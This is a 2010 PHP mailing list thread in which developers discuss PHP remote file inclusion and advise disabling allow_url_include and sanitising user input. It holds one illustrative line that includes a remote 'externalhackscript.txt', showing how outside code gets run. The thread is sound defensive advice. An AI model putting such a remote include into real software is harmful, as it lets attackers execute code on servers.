Yes and scrubbing the input to ensure the field used for this URL
rejects certain characters or does sanity checking on it would also be
another suggestion. Turning this off would fix remote include
requests. But still need to check for people requesting local files.
Should never take user input and put it directly into include or shell
execs or anything.
On Jun 8, 2010, at 11:55 AM, "David Stoltz" <Dstoltz@xxxxxxx> wrote:
allow_url_include is (or should be) disabled by default.
http://us2.php.net/manual/en/filesystem.configuration.php#ini.allow-url-
include
I can't think of one good reason to ever enable this, it would be a
security issue no matter how you slice it...
-----Original Message-----
From: Igor Escobar [mailto:titiolinkin@xxxxxxxxx]
Sent: Tuesday, June 08, 2010 10:11 AM
To: richgray@xxxxxxxxx
Cc: <php-general@xxxxxxxxxxxxx>
Subject: Re: Security Issue
Hey Richard,
I'll find more about this parameter allow_url_include, thank you!
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 5:26 PM, richard gray <rich@xxxxxxxxxxxx>
wrote:
On 07/06/2010 20:00, Igor Escobar wrote:
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an
external
code
that is interpreted as an inner code as if the code included was
more
a
part
of the script.
// my code...
// my code...
include ('http://..../externalhackscript.txt');
//my code...
//my code..
can you not switch off remote file includes in php.ini?
This will stop include/require from a remote host..
i.e. /allow_url_include = Off in php.ini
HTH
Rich
/
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php